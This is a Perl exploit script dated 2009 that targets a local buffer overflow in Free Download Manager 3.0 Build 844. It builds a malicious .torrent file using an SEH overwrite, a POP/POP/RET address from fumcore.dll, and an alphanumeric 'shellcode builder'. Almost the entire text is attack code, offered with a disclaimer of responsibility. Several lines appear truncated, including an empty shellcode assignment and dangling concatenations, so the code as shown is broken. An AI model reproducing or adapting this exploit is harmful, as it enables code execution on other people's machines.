Free Download Manager 3.0 Build 844 - '.torrent' Local Buffer Overflow













# Free Download Manager <= 3.0 Build 844 .torrent BOF Exploit
# -----------------------------------------------------------
# Exploit by SkD 			 (
# Vendors URL =
# []
# Download FDM 3.0 Build 844 =
# []
# (Downloaded by over 1.6 million users!)
# This is another one of the more advanced exploitation methods
# for buffer overflows using my method called "shell building".
# It utilizes a SEH overflow and then a shellcode builder/assembler
# "builds"/or "assembles" bytes that were deleted by transformation
# of the buffer so that the shellcode will work without a flaw.
# I have been able to do this because of my recent experiences with
# UNICODE based overflows (heap & stack). This is a demonstration
# of how you can obtain power with limitations to buffer.
# Of course I could have used my shellhunting technique,
# but this is a new method, and to demonstrate it in a world of
# dying buffer overflows is important for me.
# Unfortunately I did not have time to make this a universal exploit
# so it will only work on all NT systems EXCEPT Vista (due to randomized
# heap, etc). But with a few modifications it can work (sure of it).
# Read my notes & comments in the script for more info.
# Tested on Windows XP SP3 (Fully Patched) & Windows 2000 SP4.
# Note: Author has no responsibility over the damage you do with this!

use strict;
use warnings;

my $tdata1 = "\x64\x38\x3A\x61\x6E\x6E\x6F\x75\x6E\x63\x65\x31\x32\x3A\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x37\x3A\x63\x6F\x6D".
my $tdata2 = "\x31\x32\x3A\x70\x69\x65\x63\x65\x20\x6C\x65\x6E\x67\x74\x68\x69\x32\x36\x32\x31\x34\x34\x65\x36\x3A\x70\x69\x65\x63\x65\x73".

# win32_exec -  EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum
my $shellcode =
#Notice I added 0x01 byte before each 0x80=> byte.

#This is the shellcode builder or assembler. It gets the location of the shellcode and then from there does
#the appropriate modifications to apply the correct hex bytes that were deleted off the buffer (0x80=> bytes).
#You can only use the Alpha numerical shellcodes for the Shellcode builder ;), but remember to add
#0x01 before each 0x80=> byte.
my $shellcode_builder = ("\x59" x 3 ."\x40" x 9 . "\x51\x5b"."\x4b" x 4 ."\x01\x03"."\x48" x 10 ."\x43\x01\x03" x 3).
			("\x4b" x 3 ."\x03\x0b" x 35 ."\x41" x 14 ."\x41\x01\x01\x01\x01"."\x41\x01\x01" x 2).
                        ("\x49" x 3 ."\x48"."\x01\x01" x 5 ."\x40" x 3 ."\x01\x01\x41\x01\x01").
                        ("\x49" x 2 ."\x48" x 3 ."\x01\x01" x 13 ."\x40" x 3 ."\x01\x01\x41\x01\x01").
                        ("\x49" x 3 ."\x48" x 3 ."\x01\x01" x 11 ."\x49" x 3 ."\x01\x01" x 11).
                        ("\x40" x 3 ."\x41\x01\x01"."\x41" x 3 ."\x01\x01"."\x41" x 6 ."\x01\x01");
my $len = 12999 - (10000 + (350 - length($shellcode_builder)) + length($shellcode) + 12 + length($shellcode_builder)); #Really important calculation to overflow the stack													       #and set everything in the right places(ret,addr,etc).
my $shellcode_builder_label = "\x01\x01\x01\x01"; #Used as a 'label' to create a DWORD 0x0000000a used in a calculation to get shellcode location.
my $overflow1 = "\x41" x 10000;
my $overflow2 = "\x41" x $len;
my $sled = "\x41" x (350 - length($shellcode_builder));
my $sehjmp = "\x71\x06\x01\x01"; #Since we cannot use 0xEB, I am going to use another type of jump ;)
my $sehret = "\x1a\x09\x03\x10"; #0x1003091A fumcore.dll POP ESI, POP EDI, RETN (For XP <= Systems)

open(my $torrent, "> s.torrent");
print $torrent $tdata1.
close $torrent;

# [2009-02-03]